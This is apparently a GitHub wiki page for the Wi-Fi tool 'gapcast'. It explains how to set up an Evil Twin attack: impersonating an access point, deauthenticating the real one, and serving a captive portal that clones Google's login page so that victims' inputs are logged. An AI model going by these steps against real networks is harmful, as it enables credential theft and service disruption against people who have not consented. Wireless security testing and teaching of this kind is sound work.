Skip to content

Evil Twin

Jump to bottom
Andrea Vaccaro edited this page Jul 26, 2024 · 8 revisions

🌐Evil-Twin with Captive Portal

Evil Twin Example

This manual walks you through the process of configuring and executing an Evil Twin attack with a captive portal. This attack is designed to impersonate a legitimate Wi-Fi access point in order to trick users into connecting to it.

Aside from 📚dependencies, the most important requirement is the NIC (Network Interface Card).

  • The first NIC selected during gapcast startup (from parameter -i <iface>) is used to run AP.

  • The secondary NIC (selected during attack startup) is used to deauthenticate the victim AP (optional but highly recommended).


⚠️It's important that both these NICs support monitor mode.

🚀How to start Evil-Twin environment

  1. Open the INJ Table.
  2. Select the third available attack option, which is Evil-Twin.
  3. Upon selection, an input bar will appear, After selection, an input bar will appear to fill in the victim AP.

🔧Alternatively, you can bypass this step 3 by using the -b <BSSID> parameter to specify the BSSID directly.

🗞Setup steps

➡️As a first step there is the selection of the web template for the Captive Portal, in version 1.0.3 there are 2 templates available:

  • GoogleLogIn: GoogleLogIn model is a clone of Google page login.
  • CustomVideo: CustomVideo model open a video in full-screen automatically.

In the case of login pages, the input that the user will give will be reported in the Gapcast log.

📝If these templates do not meet the requirements, you can create a template from scratch using this guide.

➡️As a second step there is the selection in the NIC, the secondary NIC that will be selected will be used for deauthentication. In the selection the NIC in use will be discarded (for running the AP) and in case it is not present or you do not need to use it, just do not select anything.

📜Logs

🔍[LOG] log: Indicates preliminary commands before Evil Twin operation and termination.

🔍[AP-INFO] log:

  • Provides details of the counterfeit access point (AP):
    • Name (prefixed with a blank character to prevent AP substitution issues)
    • MAC Address (with the last byte of the last octet modified)
    • Transmission channel

🔍[HOSTAPD-LOG] log: Logs related to hostapd software.

🔍[INJ-LOG] log:

  • Logs related to injection, detailing:
    • Start of deauthentication
    • Any errors of deauthentication
    • Conclusion of deauthentication

🔍[INFO-GRABBED] log:

  • Interpreter for Apache2 logs (Connections, GET/POST requests with ACTION spec)
  • Grabbed information from user inputs

How to create custom web model

Documentation coming soon🚀

Clone this wiki locally